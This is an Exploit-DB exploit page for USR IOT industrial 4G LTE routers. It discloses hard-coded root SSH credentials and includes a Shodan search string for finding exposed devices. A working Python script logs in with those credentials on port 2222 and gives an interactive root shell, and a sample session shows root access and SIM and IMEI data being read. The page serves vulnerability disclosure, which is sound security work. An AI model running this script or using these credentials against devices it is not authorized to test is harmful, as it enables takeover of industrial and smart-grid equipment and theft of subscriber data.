USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 – Remote Root Backdoor

  • 作者: LiquidWorm
    日期: 2022-05-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50894/
  • # Exploit Title: USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor
    # Exploit Author: LiquidWorm
    
    #!/usr/bin/env python3
    #
    #
    # USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
    #
    #
    # Vendor: Jinan USR IOT Technology Limited
    # Product web page: https://www.pusr.com | https://www.usriot.com
    # Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
    # 1.2.7 (USR-LG220-L)
    #
    # Summary: USR-G806 is a industrial 4G wireless LTE router which provides
    # a solution for users to connect own device to 4G network via WiFi interface
    # or Ethernet interface. USR-G806 adopts high performance embedded CPU which
    # can support 580MHz working frequency and can be widely used in Smart Grid,
    # Smart Home, public bus and Vending machine for data transmission at high
    # speed. USR-G806 supports various functions such as APN card, VPN, WIFIDOG,
    # flow control and has many advantages including high reliability, simple
    # operation, reasonable price. USR-G806 supports WAN interface, LAN interface,
    # WLAN interface, 4G interface. USR-G806 provides various networking mode
    # to help user establish own network.
    #
    # Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
    # within its Linux distribution image. These sets of credentials are never
    # exposed to the end-user and cannot be changed through any normal operation
    # of the device. The 'usr' account with password 'www.usr.cn' has the highest
    # privileges on the device. The password is also the default WLAN password.
    # Shodan Dork: title:"usr-*"// 4,648 ed ao 15042022
    #
    # -------------------------------------------------------------------------
    # lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
    #
    # --Got rewt!
    # # id;id root;pwd
    # uid=0(usr) gid=0(usr)
    # uid=2(root) gid=2(root) groups=2(root)
    # /root
    # # crontab -l
    # */2 * * * * /etc/ltedial
    # */20 * * * * /etc/init.d/Net_4G_Check.sh
    # */15 * * * * /etc/test_log.sh
    # */120 * * * * /etc/pddns/pddns_start.sh start &
    # 44 4 * * * /etc/init.d/sysreboot.sh &
    # */5 * * * * ps | grep "/usr/sbin/ntpd"&& /etc/init.d/sysntpd stop;
    # 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
    # cat /tmp/usrlte_info
    # Local time is Fri Apr 15 05:38:56 2022
    # (loop)
    # IMEI Number:8*************1
    # Operator information:********Telecom
    # signal intensity:normal(20)
    #
    # Software version number:E*****************G
    # SIM Card CIMI number:4*************7
    # SIM Card number:8******************6
    # Short message service center number:"+8**********1"
    # system information:4G Mode
    # PDP protocol:"IPV4V6"
    # CREG:register
    # Check ME password:READY
    # base station information:"4**D","7*****B"
    # cat /tmp/usrlte_info_imsi
    # 4*************7
    # # exit
    #
    # lqwrm@metalgear:~$ 
    # -------------------------------------------------------------------------
    #
    # Tested on: GNU/Linux 3.10.14 (mips)
    #OpenWrt/Linaro GCC 4.8-2014.04
    #Ralink SoC MT7628 PCIe RC mode
    #BusyBox v1.22.1
    #uhttpd
    #Lua
    #
    #
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # @zeroscience
    #
    #
    # Advisory ID: ZSL-2022-5705
    # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
    #
    #
    # 10.04.2022
    #
    
    
    import paramiko as bah
    import sys as baaaaaah
    
    bnr='''
    ▄• ▄▌.▄▄ · ▄▄▄▪▄▄▄▄▄
    █▪██▌▐█ ▀. ▀▄ █·██ ▪ •██
    █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄▐█.▪
    ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌·
    ▄▄▄▄·▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀▄▄▄
    ▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █·
    ▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄▄█▀▄ ▐▀▀▄ 
    ██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌
    ·▀▀▀▀▀▀ ▄▄▄▀ ·▀▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀▀
    ▀▄ █·▪ ▪ •██
    ▐▀▀▄▄█▀▄▄█▀▄▐█.▪
    ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌·
     ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ ·
    ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀.
    ▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄ 
    ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█ 
     ▀▀ ·▀▀▀ ·▀▀▀▀▀▀▀▀▀▀▀▀▀▀
    '''
    print(bnr)
    
    if len(baaaaaah.argv)<2:
    print('--Gief me an IP.')
    exit(0)
    
    adrs=baaaaaah.argv[1]
    unme='usr'
    pwrd='www.usr.cn'
    
    rsh=bah.SSHClient()
    rsh.set_missing_host_key_policy(bah.AutoAddPolicy())
    try:
    rsh.connect(adrs,username=unme,password=pwrd,port=2222) #22 Ook.
    print('--Got rewt!')
    except:
    print('--Backdoor removed.')
    exit(-1)
    
    while True:
    cmnd=input('# ')
    if cmnd=='exit':
    rsh.exec_command('exit')
    break
    stdin,stdout,stderr = rsh.exec_command(cmnd)
    print(stdout.read().decode().strip())
    
    rsh.close()